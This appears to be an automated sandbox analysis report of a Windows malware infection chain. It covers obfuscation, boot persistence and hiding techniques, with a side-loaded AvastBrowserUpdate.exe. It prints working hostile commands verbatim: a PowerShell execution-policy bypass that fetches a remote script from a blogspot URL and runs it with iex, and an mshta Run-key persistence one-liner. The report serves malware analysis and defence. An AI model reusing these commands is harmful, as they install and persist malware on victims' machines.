                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9672_none_d08f9da24428a513\MSVCR80.dll
                      Source: Binary string: D:\a\_work\e\src\out\Release_x64\elevation_service.exe.pdb source: elevation_service.exe, 00000022.00000002.289639624751.00007FF652B16000.00000002.00000001.01000000.00000012.sdmp, elevation_service.exe, 00000022.00000000.289636577659.00007FF652B16000.00000002.00000001.01000000.00000012.sdmp
                      Source: Binary string: wkernel32.pdb source: svchost.exe, 00000013.00000003.289414994151.0000000005320000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.289414786038.0000000005200000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: wkernelbase.pdb source: svchost.exe, 00000013.00000003.289415524202.0000000005200000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.289416235563.0000000005420000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: ntdll.pdb source: svchost.exe, 00000013.00000003.289411881417.0000000005200000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.289412522901.00000000053F0000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000021.00000003.289635046903.0000022D0CFF0000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000021.00000003.289634553663.0000022D0CE00000.00000004.00000001.00020000.00000000.sdmp, msedge.exe, 00000026.00000003.289666544287.00000217CE5E0000.00000004.00000001.00020000.00000000.sdmp, msedge.exe, 00000026.00000003.289667109372.00000217CE7D0000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: wntdll.pdbUGP source: svchost.exe, 00000013.00000003.289413502649.0000000005200000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.289414086820.00000000053A0000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: ntdll.pdbUGP source: svchost.exe, 00000013.00000003.289411881417.0000000005200000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.289412522901.00000000053F0000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000021.00000003.289635046903.0000022D0CFF0000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000021.00000003.289634553663.0000022D0CE00000.00000004.00000001.00020000.00000000.sdmp, msedge.exe, 00000026.00000003.289666544287.00000217CE5E0000.00000004.00000001.00020000.00000000.sdmp, msedge.exe, 00000026.00000003.289667109372.00000217CE7D0000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: wntdll.pdb source: svchost.exe, 00000013.00000003.289413502649.0000000005200000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.289414086820.00000000053A0000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: D:\a\_work\e\src\out\Release_x64\elevation_service.exe.pdbOGP source: elevation_service.exe, 00000022.00000002.289639624751.00007FF652B16000.00000002.00000001.01000000.00000012.sdmp, elevation_service.exe, 00000022.00000000.289636577659.00007FF652B16000.00000002.00000001.01000000.00000012.sdmp
                      Source: Binary string: D:\a\_work\e\src\out\Release_x64\msedge_elf.dll.pdb source: msedge.exe, 00000026.00000002.289674194363.00007FFB6AFC5000.00000002.00000001.01000000.00000015.sdmp
                      Source: Binary string: AvastBrowserUpdate_unsigned.pdb source: AvastBrowserUpdate.exe
                      Source: Binary string: wkernelbase.pdbUGP source: svchost.exe, 00000013.00000003.289415524202.0000000005200000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.289416235563.0000000005420000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: wkernel32.pdbUGP source: svchost.exe, 00000013.00000003.289414994151.0000000005320000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.289414786038.0000000005200000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: D:\a\_work\e\src\out\Release_x64\msedge_elf.dll.pdbOGP source: msedge.exe, 00000026.00000002.289674194363.00007FFB6AFC5000.00000002.00000001.01000000.00000015.sdmp

                      Data Obfuscation

                      Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: ShellExecute("powershell", "-ep Bypass -c [Net.ServicePointManager]", "", "open", "0");
                      Source: 3.2.powershell.exe.29a437d0000.0.raw.unpack, W3mIAMad8mK4ZyYb8CQ.cs .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                      Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm https://kalacpamarchclean.blogspot.com/chig.doc) | . iex;Start-Sleep -Seconds 7;
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exe Code function: 52_2_6BA0447A CloseHandle,InitializeCriticalSection,CreateSemaphoreW,CreateSemaphoreW,CreateSemaphoreW,CreateThread,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,InitializeCriticalSection,EnterCriticalSection,SetUnhandledExceptionFilter,LeaveCriticalSection, 52_2_6BA0447A
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_031D5D5E push esi; ret 7_2_031D5D69
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_031D1F6A push eax; ret 7_2_031D1F75
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_031D4F89 push edi; iretd 7_2_031D4F96
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_031D31DC push eax; ret 7_2_031D31DD
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_031D4FD4 push ss; retf 7_2_031D4FF5
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_031D3C39 push ecx; ret 7_2_031D3C59
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_031D625D push es; ret 7_2_031D6264
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_031D20F9 push FFFFFF82h; iretd 7_2_031D20FB
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_031D54F9 push edx; retf 7_2_031D54FC
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_031D38EC push edi; ret 7_2_031D38F8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_06946951 push es; retf 7_2_06946957
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_06546951 push es; retf 8_2_06546957
                      Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe Code function: 12_2_00DD0710 push 6AA6DA9Ah; retn 0000h 12_2_00DD0715
                      Source: C:\Windows\SysWOW64\svchost.exe Code function: 19_3_00774054 push ss; retf 19_3_00774075
                      Source: C:\Windows\SysWOW64\svchost.exe Code function: 19_3_0077225C push eax; ret 19_3_0077225D
                      Source: C:\Windows\SysWOW64\svchost.exe Code function: 19_3_00774009 push edi; iretd 19_3_00774016
                      Source: C:\Windows\SysWOW64\svchost.exe Code function: 19_3_007752DD push es; ret 19_3_007752E4
                      Source: C:\Windows\SysWOW64\svchost.exe Code function: 19_3_00772CB9 push ecx; ret 19_3_00772CD9
                      Source: C:\Windows\SysWOW64\svchost.exe Code function: 19_3_00771179 push FFFFFF82h; iretd 19_3_0077117B
                      Source: C:\Windows\SysWOW64\svchost.exe Code function: 19_3_00774579 push edx; retf 19_3_0077457C
                      Source: C:\Windows\SysWOW64\svchost.exe Code function: 19_3_0077296C push edi; ret 19_3_00772978
                      Source: C:\Windows\SysWOW64\svchost.exe Code function: 19_3_00770FEA push eax; ret 19_3_00770FF5
                      Source: C:\Windows\SysWOW64\svchost.exe Code function: 19_3_00774DDE push esi; ret 19_3_00774DE9
                      Source: C:\Windows\SysWOW64\SettingSyncHost.exe Code function: 20_3_02774054 push ss; retf 20_3_02774075
                      Source: C:\Windows\SysWOW64\SettingSyncHost.exe Code function: 20_3_0277225C push eax; ret 20_3_0277225D
                      Source: C:\Windows\SysWOW64\SettingSyncHost.exe Code function: 20_3_02774009 push edi; iretd 20_3_02774016
                      Source: C:\Windows\SysWOW64\SettingSyncHost.exe Code function: 20_3_027752DD push es; ret 20_3_027752E4
                      Source: C:\Windows\SysWOW64\SettingSyncHost.exe Code function: 20_3_02772CB9 push ecx; ret 20_3_02772CD9
                      Source: C:\Windows\SysWOW64\SettingSyncHost.exe Code function: 20_3_02771179 push FFFFFF82h; iretd 20_3_0277117B
                      Source: C:\Windows\SysWOW64\SettingSyncHost.exe Code function: 20_3_02774579 push edx; retf 20_3_0277457C
                      Source: C:\Windows\SysWOW64\SettingSyncHost.exe Code function: 20_3_0277296C push edi; ret 20_3_02772978
                      Source: 3.2.powershell.exe.29a437d0000.0.raw.unpack, A9CvUGp4kU1V2hHRFHn.cs High entropy of concatenated method names: 'OX7e2Hy5Pt', 'dWKevvZJWu', 'rs4eoMXh0k', 'C7heyHoNeq', 'VmMegQgJFI', 'sPJeTlCyGc', 'gveeEdLYki', 'TmWWCaItRt', 'JXxeXmkKa9', 'cJwe5uCKXW'
                      Source: 3.2.powershell.exe.29a437d0000.0.raw.unpack, B.cs High entropy of concatenated method names: 'Main', 'w0wVCfytf', 'KimKarden', 'eVExnSBWA', 'H7e8o26fl', 'HiPnANG73', 'agI9UShdl', 'lskkZTUSN', 'jtX7KDGmL', 'hCmRr5SQP'
                      Source: 3.2.powershell.exe.29a437d0000.0.raw.unpack, W3mIAMad8mK4ZyYb8CQ.cs High entropy of concatenated method names: 'OHhxno9LMv59JwkpBPX', 'G66a6A9UBrBVeZ9yO97', 'Qn5CJCt4Zo', 'vh0ry9Sq2v', 'NAgCzWe3ZP', 'pY9pAMnRJn', 't34paM2Ne2', 'xvopCy1n4p', 'FjhRFseRF0', 'AWLahn4oRf'
                      Source: C:\Program Files\Windows Media Player\wmlaunch.exe File created: C:\Users\user\AppData\Roaming\Avlogo\goopdate.dll
                      Source: C:\Program Files\Windows Media Player\wmlaunch.exe File created: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exe
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exe Code function: 52_2_6B8F4222 GetPrivateProfileIntW,GetPrivateProfileIntW,GetPrivateProfileIntW,GetPrivateProfileIntW,GetPrivateProfileIntW,GetPrivateProfileStringW,GetPrivateProfileIntW, 52_2_6B8F4222

                      Boot Survival

                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Usecurekala77
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Usecurekala77 mshta "javascript:var fll = ['Shell.Application', 'SHELLEXECUTE', 'powershell', '-ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm https://kalacpamarchclean.blogspot.com/chig.doc) | . iex;Start-Sleep -Seconds 7;', '', 'open', 0], jve = ['Scripting.FileSystemObject', 'DeleteFile', 'WScript.ScriptFullName'], loo = new ActiveXObject(fll[0]); loo[fll[1]](fll[2], fll[3], fll[4], fll[5], fll[6]);close(); new ActiveXObject(jve[0])[jve[1]](WScript[jve[2]]);"
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run drakekala157
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exe Code function: 52_2_6B9F8366 OpenSCManagerW,OpenServiceW,QueryServiceStatus,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle, 52_2_6B9F8366

                      Hooking and other Techniques for Hiding and Protection

                      Source: C:\Windows\System32\wscript.exe File deleted: c:\users\user\desktop\0a0#u00a0.js
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                      Source: C:\Program Files\Windows Media Player\wmlaunch.exe Key value created or modified: HKEY_CURRENT_USER\SOFTWARE\avlogo CfgData
                      Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
